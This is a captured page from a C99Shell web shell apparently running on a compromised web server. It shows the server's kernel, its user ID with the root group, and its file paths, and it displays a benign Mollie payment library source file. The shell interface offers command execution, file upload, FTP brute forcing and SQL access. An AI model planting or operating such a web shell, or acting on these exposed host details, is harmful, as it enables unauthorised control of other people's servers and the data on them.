!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.smm.picotech.app/public_html/vendor/mollie/mollie-api-php/src/Resources/   drwxr-xr-x
Free 28.66 GB of 117.98 GB (24.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     PaymentLink.php (2.46 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Mollie\Api\Resources;

class 
PaymentLink extends BaseResource
{
    
/**
     * Id of the payment link (on the Mollie platform).
     *
     * @var string
     */
    
public $id;

    
/**
     * Mode of the payment link, either "live" or "test" depending on the API Key that was
     * used.
     *
     * @var string
     */
    
public $mode;

    
/**
     * The profile ID this payment link belongs to.
     *
     * @example pfl_QkEhN94Ba
     * @var string
     */
    
public $profileId;

    
/**
     * UTC datetime the payment link was created in ISO-8601 format.
     *
     * @example "2013-12-25T10:30:54+00:00"
     * @var string|null
     */
    
public $createdAt;

    
/**
     * UTC datetime the payment was paid in ISO-8601 format.
     *
     * @example "2013-12-25T10:30:54+00:00"
     * @var string|null
     */
    
public $paidAt;

    
/**
     * Whether the payment link is archived. Customers will not be able to complete
     * payments on archived payment links.
     *
     * @var bool
     */
    
public $archived;
    
    
/**
     * UTC datetime the payment link was updated in ISO-8601 format.
     *
     * @example "2013-12-25T10:30:54+00:00"
     * @var string|null
     */
    
public $updatedAt;

    
/**
     * UTC datetime - the expiry date of the payment link in ISO-8601 format.
     *
     * @example "2013-12-25T10:30:54+00:00"
     * @var string|null
     */
    
public $expiresAt;

    
/**
     * Amount object containing the value and currency
     *
     * @var \stdClass
     */
    
public $amount;

    
/**
     * Description of the payment link that is shown to the customer during the payment,
     * and possibly on the bank or credit card statement.
     *
     * @var string
     */
    
public $description;

    
/**
     * Redirect URL set on this payment
     *
     * @var string
     */
    
public $redirectUrl;

    
/**
     * Webhook URL set on this payment link
     *
     * @var string|null
     */
    
public $webhookUrl;

    
/**
     * @var \stdClass
     */
    
public $_links;

    
/**
     * Is this payment paid for?
     *
     * @return bool
     */
    
public function isPaid()
    {
        return ! empty(
$this->paidAt);
    }

    
/**
     * Get the checkout URL where the customer can complete the payment.
     *
     * @return string|null
     */
    
public function getCheckoutUrl()
    {
        if (empty(
$this->_links->paymentLink)) {
            return 
null;
        }

        return 
$this->_links->paymentLink->href;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--